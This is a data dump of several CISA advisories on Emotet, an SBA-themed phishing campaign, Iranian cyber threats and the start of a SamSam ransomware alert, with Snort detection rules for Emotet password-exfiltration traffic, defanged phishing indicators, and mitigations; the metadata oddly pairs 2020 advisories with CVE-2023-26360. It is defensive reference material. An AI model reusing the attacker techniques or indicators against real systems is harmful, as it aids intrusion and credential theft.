`HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run` key to maintain persistence. \n \n_Scheduled Task/Job: Scheduled Task_ [[T1053.005](<https://attack.mitre.org/versions/v7/techniques/T1053/005/>)]\n\n| \n\nEmotet has maintained persistence through a scheduled task. \n \n_Unsecured Credentials: Credentials In Files_ [[T1552.001](<https://attack.mitre.org/versions/v7/techniques/T1552/001/>)]\n\n| \n\nEmotet has been observed leveraging a module that retrieves passwords stored on a system for the current logged-on user. \n \n_Credentials from Password Stores: Credentials from Web Browsers_ [[T1555.003](<https://attack.mitre.org/versions/v7/techniques/T1555/003/>)]\n\n| \n\nEmotet has been observed dropping browser password grabber modules. \n \n_Archive Collected Data _[[T1560](<https://attack.mitre.org/versions/v7/techniques/T1560/>)]\n\n| \n\nEmotet has been observed encrypting the data it collects before sending it to the C2 server. \n \n_Phishing: Spearphishing Attachment_ [[T1566.001](<https://attack.mitre.org/versions/v7/techniques/T1566/001/>)]\n\n| \n\nEmotet has been delivered by phishing emails containing attachments. \n \n_Phishing: Spearphishing Link_ [[T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002/>)]\n\n| \n\nEmotet has been delivered by phishing emails containing links. \n \n_Non-Standard Port_ [[T1571](<https://attack.mitre.org/versions/v7/techniques/T1571/>)]\n\n| \n\nEmotet has used HTTP over ports such as 20, 22, 7080, and 50000, in addition to using ports commonly associated with HTTP/Hypertext Transfer Protocol Secure. \n \n_Encrypted Channel: Asymmetric Cryptography_ [[T1573.002](<https://attack.mitre.org/versions/v7/techniques/T1573/002/>)]\n\n| \n\nEmotet is known to use RSA keys for encrypting C2 traffic. \n \n### Detection\n\n#### Signatures\n\nMS-ISAC developed the following Snort signature for use in detecting network activity associated with Emotet activity.\n\n`alert tcp $HOME_NET any -> $EXTERNAL_NET 443 (msg:\"[CIS] Emotet C2 Traffic Using Form Data to Send Passwords\"; content:\"POST\"; http_method; content:\"Content-Type|3a 20|multipart/form-data|3b 20|boundary=\"; http_header; fast_pattern; content:\"Content-Disposition|3a 20|form-data|3b 20|name=|22|\"; http_client_body; content:!\"------WebKitFormBoundary\"; http_client_body; content:!\"Cookie|3a|\"; pcre:\"/:?(chrome|firefox|safari|opera|ie|edge) passwords/i\"; reference:url,cofense.com/flash-bulletin-emotet-epoch-1-changes-c2-communication/; sid:1; rev:2;)`\n\nCISA developed the following Snort signatures for use in detecting network activity associated with Emotet activity. **Note:** Uniform Resource Identifiers should contain a random length alphabetical multiple directory string, and activity will likely be over ports 80, 8080, or 443.\n\n`alert tcp any any -> any $HTTP_PORTS (msg:\"EMOTET:HTTP URI GET contains '/wp-content/###/'\"; sid:00000000; rev:1; flow:established,to_server; content:\"/wp-content/\"; http_uri; content:\"/\"; http_uri; distance:0; within:4; content:\"GET\"; nocase; http_method; urilen:<17; classtype:http-uri; content:\"Connection|3a 20|Keep-Alive|0d 0a|\"; http_header; metadata:service http;)`\n\n`alert tcp any any -> any $HTTP_PORTS (msg:\"EMOTET:HTTP URI GET contains '/wp-admin/###/'\"; sid:00000000; rev:1; flow:established,to_server; content:\"/wp-admin/\"; http_uri; content:\"/\"; http_uri; distance:0; within:4; content:\"GET\"; nocase; http_method; urilen:<15; content:\"Connection|3a 20|Keep-Alive|0d 0a|\"; http_header; classtype:http-uri; metadata:service http;)`\n\n### Mitigations\n\nCISA and MS-ISAC recommend that network defenders\u2014in federal, state, local, tribal, territorial governments, and the private sector\u2014consider applying the following best practices to strengthen the security posture of their organization's systems. System owners and administrators should review any configuration changes prior to implementation to avoid unwanted impacts.\n\n * Block email attachments commonly associated with malware (e.g.,.dll and .exe).\n * Block email attachments that cannot be scanned by antivirus software (e.g., .zip files).\n * Implement Group Policy Object and firewall rules.\n * Implement an antivirus program and a formalized patch management process.\n * Implement filters at the email gateway, and block suspicious IP addresses at the firewall.\n * Adhere to the principle of least privilege.\n * Implement a Domain-Based Message Authentication, Reporting &amp; Conformance validation system.\n * Segment and segregate networks and functions.\n * Limit unnecessary lateral communications.\n * Disable file and printer sharing services. If these services are required, use [strong passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) or Active Directory authentication.\n * Enforce multi-factor authentication.\n * Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See [Using Caution with Email Attachments](<https://www.us-cert.gov/ncas/tips/ST04-010>).\n * Enable a firewall on agency workstations, configured to deny unsolicited connection requests.\n * Disable unnecessary services on agency workstations and servers.\n * Scan for and remove suspicious email attachments; ensure the scanned attachment is its \"true file type\" (i.e., the extension matches the file header).\n * Monitor users' web browsing habits; restrict access to suspicious or risky sites.\n * Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).\n * Scan all software downloaded from the internet prior to executing.\n * Maintain situational awareness of the latest threats and implement appropriate access control lists.\n * Visit the MITRE ATT&amp;CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.\n * See CISA\u2019s Alert on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for more information on addressing potential incidents and applying best practice incident response procedures.\n * See the joint [CISA and MS-ISAC Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>) on how to be proactive and prevent ransomware attacks from happening and for a detailed approach on how to respond to an attack and best resolve the cyber incident.\n\nFor additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, [Guide to Malware Incident Prevention and Handling for Desktops and Laptops](<https://csrc.nist.gov/publications/detail/sp/800-83/rev-1/final>).\n\n### Resources\n\n * [MS-ISAC Security Event Primer \u2013 Emotet](<https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/>)\n * [CISA Alert TA18-201A \u2013 Emotet Malware](<https://us-cert.cisa.gov/ncas/alerts/TA18-201A>)\n * [MITRE ATT&amp;CK \u2013 Emotet](<https://attack.mitre.org/software/S0367/>)\n * [MITRE ATT&amp;CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>)\n\n### References\n\n[[1] Bleeping Computer: Emotet Malware Strikes U.S. Businesses with COVID-19 Spam](<https://www.bleepingcomputer.com/news/security/emotet-malware-strikes-us-businesses-with-covid-19-spam/>)\n\n[[2] IBID](<https://www.bleepingcomputer.com/news/security/emotet-malware-strikes-us-businesses-with-covid-19-spam/>)\n\n[[3] Security Lab: Emotet Update Increases Downloads](<https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/>)\n\n[[4] Proofpoint: A Comprehensive Look at Emotet\u2019s Summer 2020 Return](<https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return>)\n\n[[5] ZDNet: France, Japan, New Zealand Warn of Sudden Strike in Emotet Attacks](<https://www.zdnet.com/article/france-japan-new-zealand-warn-of-sudden-spike-in-emotet-attacks/>)\n\n[[6] Bleeping Computer: France Warns of Emotet Attacking Companies, Administration](<https://www.bleepingcomputer.com/news/security/france-warns-of-emotet-attacking-companies-administration/>)\n\n[[7] ESET: Emotet Strikes Quebec\u2019s Department of Justice: An ESET Analysis](<https://www.welivesecurity.com/2020/09/16/emotet-quebec-department-justice-eset/>)\n\n[[8] ZDNet: Microsoft, Italy, and the Netherlands Warn of Increased Emotet Activity](<https://www.zdnet.com/article/microsoft-italy-and-the-netherlands-warn-of-increased-emotet-activity/>)\n\n[[9] Bleeping Computer: Emotet Double Blunder: Fake \u2018Windows 10 Mobile\u2019 and Outdated Messages](<https://www.bleepingcomputer.com/news/security/emotet-double-blunder-fake-windows-10-mobile-and-outdated-messages/>)\n\n[[10] Palo Alto Networks: Case Study: Emotet Thread Hijacking, an Email Attack Technique](<https://unit42.paloaltonetworks.com/emotet-thread-hijacking/>)\n\n### Revisions\n\nOctober 6, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Emotet Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2020-10-24T12:00:00", "id": "AA20-280A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-280a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T13:05:09", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is currently tracking an unknown malicious cyber actor who is spoofing the Small Business Administration (SBA) COVID-19 loan relief webpage via phishing emails. These emails include a malicious link to the spoofed SBA website that the cyber actor is using for malicious re-directs and credential stealing.\n\n### Technical Details\n\nCISA analysts observed an unknown malicious cyber actor sending a phishing email to various Federal Civilian Executive Branch and state, local, tribal, and territorial government recipients. The phishing email contains:\n\n * A subject line, **SBA Application \u2013 Review and Proceed**\n * A sender, marked as **disastercustomerservice@sba[.]gov**\n * Text in the email body urging the recipient to click on a hyperlink to address: \n`hxxps://leanproconsulting[.]com.br/gov/covid19relief/sba.gov`\n * The domain resolves to IP address: `162.214.104[.]246`\n\nFigure 1 is a screenshot of the webpage arrived at by clicking on the hyperlink.\n\n\u200b\n\n_Figure 1: Webpage arrived at via malicious hyperlink._\n\n#### \n\n### Mitigations\n\nCISA recommends using the following best practices to strengthen the security posture of an organization's systems. System owners and administrators should review any configuration change prior to implementation to avoid unwanted impacts.\n\n * Include warning banners for all emails external to the organization.\n * Maintain up-to-date antivirus signatures and engines. See [Protecting Against Malicious Code](<https://us-cert.cisa.gov/ncas/tips/ST18-271>).\n * Ensure systems have the latest security updates. See [Understanding Patches and Software Updates](<https://us-cert.cisa.gov/ncas/tips/ST04-006>).\n * Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.\n * Restrict users' permissions to install and run unwanted software applications. Do not add users to the local administrators\u2019 group unless required.\n * Enforce a strong password policy. See [Choosing and Protecting Passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>).\n * Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See [Using Caution with Email Attachments](<https://us-cert.cisa.gov/ncas/tips/ST04-010>).\n * Enable a personal firewall on agency workstations that is configured to deny unsolicited connection requests.\n * Disable unnecessary services on agency workstations and servers.\n * Scan for and remove suspicious email attachments; ensure the scanned attachment is its \"true file type\" (i.e., the extension matches the file header).\n * Monitor users' web browsing habits; restrict access to sites with unfavorable content.\n * Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).\n * Scan all software downloaded from the internet prior to executing.\n * Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs). Sign up to receive CISA\u2019s alerts on security topics and threats.\n * [Sign up](<https://public.govdelivery.com/accounts/USDHSUSCERT/subscriber/new>) for CISA\u2019s free vulnerability scanning and testing services to help organizations secure internet-facing systems from weak configuration and known vulnerabilities. Email [vulnerability_info@cisa.dhs.gov](<mailto: vulnerability_info@cisa.dhs.gov>) to sign up. See <https://www.cisa.gov/cyber-resource-hub> for more information about vulnerability scanning and other CISA cybersecurity assessment services.\n\n### Resources\n\n * [CISA Binding Operational Directive 18-01](<https://cyber.dhs.gov/bod/18-01/>)\n * [CISA Insights: Enhance Email and Web Security](<https://www.cisa.gov/sites/default/files/publications/CISAInsights-Cyber-EnhanceEmailandWebSecurity_S508C-a.pdf>)\n * [CISA Tip: Using Caution with Email Attachments](<https://us-cert.cisa.gov/ncas/tips/ST04-010>)\n * [CISA Alert (AA20-099A): COVID-19 Exploited by Malicious Cyber Actors](<https://us-cert.cisa.gov/ncas/alerts/aa20-099a>)\n * [CISA Tip: Avoiding Social Engineering and Phishing Attacks](<https://us-cert.cisa.gov/ncas/tips/ST04-014>)\n * [VirusTotal](<https://www.virustotal.com/gui/url/ba92e042b0f8a05262adbda848b8d0de39a0badf09c219ffdb4cb1f97dcd1388/links>)\n\n### Revisions\n\nAugust 12, 2020: Initial Version|August 14, 2020: Removed some IOCs\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2020-08-14T12:00:00", "type": "ics", "title": "Malicious Cyber Actor Spoofing COVID-19 Loan Relief Webpage via Phishing Emails", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2020-08-14T12:00:00", "id": "AA20-225A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-225a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T13:08:00", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is sharing the following information with the cybersecurity community as a primer for assisting in the protection of our Nation\u2019s critical infrastructure in light of the current tensions between the Islamic Republic of Iran and the United States and Iran\u2019s historic use of cyber offensive activities to retaliate against perceived harm. Foremost, CISA recommends organizations take the following actions:\n\n 1. **Adopt a state of heightened awareness. **This includes minimizing coverage gaps in personnel availability, more consistently consuming relevant threat intelligence, and making sure emergency call trees are up to date.\n 2. **Increase organizational vigilance.** Ensure security personnel are monitoring key internal security capabilities and that they know how to identify anomalous behavior. Flag any known Iranian indicators of compromise and tactics, techniques, and procedures (TTPs) for immediate response.\n 3. **Confirm reporting processes.** Ensure personnel know how and when to report an incident. The well-being of an organization\u2019s workforce and cyber infrastructure depends on awareness of threat activity. Consider reporting incidents to CISA to help serve as part of CISA\u2019s early warning system (see Contact Information section below).\n 4. **Exercise organizational incident response plans. **Ensure personnel are familiar with the key steps they need to take during an incident. Do they have the accesses they need? Do they know the processes? Are your various data sources logging as expected? Ensure personnel are positioned to act in a calm and unified manner.\n\n### Technical Details\n\n## Iranian Cyber Threat Profile\n\nIran has a history of leveraging asymmetric tactics to pursue national interests beyond its conventional capabilities. More recently, its use of offensive cyber operations is an extension of that doctrine. Iran has exercised its increasingly sophisticated capabilities to suppress both social and political perspectives deemed dangerous to Iran and to harm regional and international opponents.\n\nIranian cyber threat actors have continuously improved their offensive cyber capabilities. They continue to engage in more \u201cconventional\u201d activities ranging from website defacement, distributed denial of service (DDoS) attacks, and theft of personally identifiable information (PII), but they have also demonstrated a willingness to push the boundaries of their activities, which include destructive wiper malware and, potentially, cyber-enabled kinetic attacks.\n\nThe U.S. intelligence community and various private sector threat intelligence organizations have identified the Islamic Revolutionary Guard Corps (IRGC) as a driving force behind Iranian state-sponsored cyberattacks\u2013either through contractors in the Iranian private sector or by the IRGC itself.\n\n## Iranian Cyber Activity\n\nAccording to open-source information, offensive cyber operations targeting a variety of industries and organizations\u2014including financial services, energy, government facilities, chemical, healthcare, critical manufacturing, communications, and the defense industrial base\u2014have been attributed, or allegedly attributed, to the Iranian government. The same reporting has associated Iranian actors with a range of high-profile attacks, including the following:\n\n * **Late 2011 to Mid-2013 \u2013 DDoS Targeting U.S. Financial Sector:** In response to this activity, in March 2016, the U.S. Department of Justice indicted seven Iranian actors employed by companies performing work on behalf of the IRGC for conducting DDoS attacks primarily targeting the public-facing websites of U.S. banks. The attacks prevented customers from accessing their accounts and cost the banks millions of dollars in remediation. [[1]](<https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged>)\n * **August/September 2013 \u2013 Unauthorized Access to Dam in New York State:** In response, in March 2016, the U.S. Department of Justice indicted one Iranian actor employed by a company performing work on behalf of the IRGC for illegally accessing the supervisory control and data acquisition (SCADA) systems of the Bowman Dam in Rye, New York. The access allowed the actor to obtain information regarding the status and operation of the dam. [[2]](<https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged>)\n * **February 2014 \u2013 Sands Las Vegas Corporation Hacked: **Cyber threat actors hacked into the Sands Las Vegas Corporation in Las Vegas, Nevada, and stole customer data, including credit card data, Social Security Numbers, and driver\u2019s license numbers. According to a Bloomberg article from December 2014, the attack also involved a destructive portion, in which the Sands Las Vegas Corporation\u2019s computer systems were wiped. In September 2015, the U.S. Director of National Intelligence identified the Iranian government as the perpetrator of the attack in a Statement for the Record to the House Permanent Select Committee on Intelligence. [[3]](<https://www.bloomberg.com/news/articles/2014-12-11/iranian-hackers-hit-sheldon-adelsons-sands-casino-in-las-vegas#p2>)\n * **2013 to 2017 \u2013 Cyber Theft Campaign on Behalf of IRGC:** In response, in March 2018, the U.S. Justice Department indicted nine Iranian actors associated with the Mabna Institute for conducting a massive cyber theft campaign containing dozens of individual incidents, including \u201cmany on behalf of the IRGC.\u201d The thefts targeted academic and intellectual property data as well as email account credentials. According to the indictment, the campaign targeted \u201c144 U.S. universities, 176 universities across 21 foreign countries, 47 domestic and foreign private sector companies, the U.S. Department of Labor, the Federal Energy Regulatory Commission, the State of Hawaii, the State of Indiana, the United Nations, and the United Nations Children\u2019s Fund.\u201d [[4]](<https://www.justice.gov/opa/pr/nine-iranians-charged-conducting-massive-cyber-theft-campaign-behalf-islamic-revolutionary>)\n\n### Mitigations\n\n## Recommended Actions\n\nThe following is a composite of actionable technical recommendations for IT professionals and providers to reduce their overall vulnerability. These recommendations are not exhaustive; rather they focus on the actions that will likely have the highest return on investment. In general, CISA recommends two courses of action in the face of potential threat from Iranian actors: 1) vulnerability mitigation and 2) incident preparation.\n\n 1. **Disable all unnecessary ports and protocols. **Review network security device logs and determine whether to shut off unnecessary ports and protocols. Monitor common ports and protocols for command and control activity.\n 2. **Enhance monitoring of network and email traffic.** Review network signatures and indicators for focused operations activities, monitor for new phishing themes and adjust email rules accordingly, and follow best practices of restricting attachments via email or other mechanisms. \n 3. **Patch externally facing equipment.** Focus on patching critical and high vulnerabilities that allow for remote code execution or denial of service on externally facing equipment.\n 4. **Log and limit usage of PowerShell. **Limit the usage of PowerShell to only users and accounts that need it, enable code signing of PowerShell scripts, and enable logging of all PowerShell commands.\n 5. **Ensure backups are up to date** and stored in an easily retrievable location that is air-gapped from the organizational network.\n\n## Patterns of Publicly Known Iranian Advanced Persistent Threats\n\nThe following mitigations and detection recommendations regarding publicly known Iranian advanced persistent threat (APT) techniques are based on the [MITRE ATT&amp;CK Framework](<https://attack.mitre.org/>). [[5]](<https://attack.mitre.org/>)\n\n**Iranian APT Technique** | **Mitigation and Detection** \n---|--- \n[Credential Dumping](<https://attack.mitre.org/versions/v7/techniques/T1003/>) | \n\nMitigation\n\n * Manage the access control list for \"Replicating Directory Changes\" and other permissions associated with domain controller replication.\n\n * Consider disabling or restricting NTLM.\n\n * Ensure that local administrator accounts have complex, unique passwords across all systems on the network.\n\n * Limit credential overlap across accounts and systems by training users and administrators not to use the same password for multiple accounts.\n\nDetection\n\n * Windows: Monitor for unexpected processes interacting with Isass.exe.\n * Linux: The AuditD monitoring tool can be used to watch for hostile processes opening a maps file in the proc file system, alerting on the pid, process name, and arguments for such programs. \n[Obfuscated Files or Information](<https://attack.mitre.org/versions/v7/techniques/T1027/>) | \n\nMitigation\n\n * Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after being processed/interpreted.\n\nDetection\n\n * Windows: Monitor for unexpected processes interacting with Isass.exe.\n * Linux: The AuditD monitoring tool can be used to watch for hostile processes opening a maps file in the proc file system, alerting on the pid, process name, and arguments for such programs. \n[Data Compressed](<https://attack.mitre.org/versions/v7/techniques/T1002/>) | \n\nMitigation\n\n * Network intrusion prevention or data loss prevention tools may be set to block specific file types from leaving the network over unencrypted channels.\n\nDetection\n\n * Process monitoring and monitoring for command-line arguments for known compression utilities.\n * If the communications channel is unencrypted, compressed files can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers. \n[PowerShell](<https://attack.mitre.org/versions/v7/techniques/T1086/>) | \n\nMitigation\n\n * Set PowerShell execution policy to execute only signed scripts.\n * Remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, since it could be in use for many legitimate purposes and administrative functions.\n * Disable/restrict the WinRM Service to help prevent uses of PowerShell for remote execution.\n * Restrict PowerShell execution policy to administrators.\n\nDetection\n\n * If PowerShell is not used in an environment, looking for PowerShell execution may detect malicious activity.\n * Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System. Management.Automation.dll (especially to unusual process names/locations).\n * Turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). \n \n[User Execution](<https://attack.mitre.org/versions/v7/techniques/T1204/>)\n\n| \n\nMitigation\n\n * Application allow listing may be able to prevent the running of executables masquerading as other files.\n * If a link is being visited by a user, network intrusion prevention systems and systems designed to scan and remove malicious downloads can be used to block activity.\n * Block unknown or unused files in transit by default that should not be downloaded or by policy from suspicious sites as a best practice to prevent some vectors, such as .scr., .exe, .pif, .cpl, etc.\n * Use user training as a way to bring awareness to common phishing and spearphishing techniques and how to raise suspicion for potentially malicious events.\n\nDetection\n\n * Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files that can be used to Deobfuscate/Decode Files or Information in payloads.\n * Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer.\n * Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as Exploitation for Client Execution and Scripting. \n[Scripting](<https://attack.mitre.org/versions/v7/techniques/T1064/>) | \n\nMitigation\n\n * Configure Office security settings enable Protected View, to execute within a sandbox environment, and to block macros through Group Policy. Other types of virtualization and application microsegmentation may also mitigate the impact of compromise.\n * Turn off unused features or restrict access to scripting engines such as VBScript or scriptable administration frameworks such as PowerShell.\n\nDetection\n\n * Examine scripting user restrictions. Evaluate any attempts to enable scripts running on a system that would be considered suspicious.\n * Scripts should be captured from the file system when possible to determine their actions and intent.\n * Monitor processes and command-line arguments for script execution and subsequent behavior.\n * Analyze Office file attachments for potentially malicious macros.\n * Office processes, such as winword.exe, spawning instances of cmd.exe, script application like wscript.exe or powershell.exe, or other suspicious processes may indicate malicious activity. \n[Registry Run Keys/Startup Folder](<https://attack.mitre.org/versions/v7/techniques/T1060/>) | \n\nMitigation\n\n * This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.\n\nDetection\n\n * Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc.\n * Monitor the start folder for additions or changes.\n * Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders.\n * To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. \n[Remote File Copy](<https://attack.mitre.org/versions/v7/techniques/T1105/>) | \n\nMitigation\n\n * Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known tools and protocols like FTP can be used to mitigate activity at the network level.\n\nDetection\n\n * Monitor for file creation and files transferred within a network over SMB.\n * Monitor use of utilities, such as FTP, that does not normally occur.\n * Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server).\n * Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. \n \n[Spearphishing Link](<https://attack.mitre.org/versions/v7/techniques/T1192/>)\n\n| \n\nMitigation\n\n * Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.\n * Users can be trained to identify social engineering techniques and spearphishing emails with malicious links.\n\nDetection\n\n * URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites.\n * Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link. \n[Spearphishing Attachment](<https://attack.mitre.org/versions/v7/techniques/T1193/>) | \n\nMitigation\n\n * Anti-virus can automatically quarantine suspicious files.\n * Network intrusion prevention systems and systems designed to scan and remove malicious email attachments can be used to block activity.\n * Block unknown or unused attachments by default that should not be transmitted over email as a best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc.\n * Some email scanning devices can open and analyze compressed and encrypted formats, such as zip and rar that may be used to conceal malicious attachments in Obfuscated Files or Information.\n * Users can be trained to identify social engineering techniques and spearphishing emails.\n\nDetection\n\n * Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit.\n * Detonation chambers may also be used to identify malicious attachments.\n * Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n * Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. \n \n### Contact Information\n\nCISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at\n\n * 1-888-282-0870 (From outside the United States: +1-703-235-8832)\n * [central@cisa.dhs.gov](<mailto:central@cisa.dhs.gov> \"Email CISA Central\" ) (UNCLASS)\n * us-cert@dhs.sgov.gov (SIPRNET)\n * us-cert@dhs.ic.gov (JWICS)\n\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA homepage at <http://www.us-cert.gov/>.\n\n### References\n\n[[1] Department of Justice press release: Seven Iranians Working for Islamic Revolutionary Guard Corps-Affiliated Entities Charged for Conducting Coordinated Campaign of Cyber Attacks Against U.S. Financial Sector](<https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged>)\n\n[[2] Department of Justice press release: Seven Iranians Working for Islamic Revolutionary Guard Corps-Affiliated Entities Charged for Conducting Coordinated Campaign of Cyber Attacks Against U.S. Financial Sector](<https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged>)\n\n[[3] Bloomberg article: Now at the Sands Casino: An Iranian Hacker in Every Server](<https://www.bloomberg.com/news/articles/2014-12-11/iranian-hackers-hit-sheldon-adelsons-sands-casino-in-las-vegas#p2>)\n\n[[4] Department of Justice press release: Nine Iranians Charged With Conducting Massive Cyber Theft Campaign on Behalf of the Islamic Revolutionary Guard Corps](<https://www.justice.gov/opa/pr/nine-iranians-charged-conducting-massive-cyber-theft-campaign-behalf-islamic-revolutionary>)\n\n[[5] MITRE ATT&amp;CK Framework](<https://attack.mitre.org/>)\n\n[CISA Insights: Increased Geopolitical Tensions and Threats](<https://www.cisa.gov/insights>)\n\n### Revisions\n\nJanuary 6, 2019: Initial version|October 23, 2020\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Potential for Iranian Cyber Response to U.S. Military Strike in Baghdad", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2020-10-24T12:00:00", "id": "AA20-006A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-006a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T11:19:20", "description": "### Summary\n\nThe Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) and the Federal Bureau of Investigation (FBI) are issuing this activity alert to inform computer network defenders about SamSam ransomware, also known as MSIL/Samas.A. Specifically, this product shares analysis of vulnerabilities that cyber actors exploited to deploy this ransomware. In addition, this report provides recommendations for prevention and mitigation.\n\nThe SamSam actors targeted multiple industries, including some within critical infrastructure. Victims were located predominately in the United States, but also internationally. Network-wide infections against organizations are far more likely to garner large ransom payments than infections of individual systems. Organizations that provide essential functions have a critical need to resume operations quickly and are more 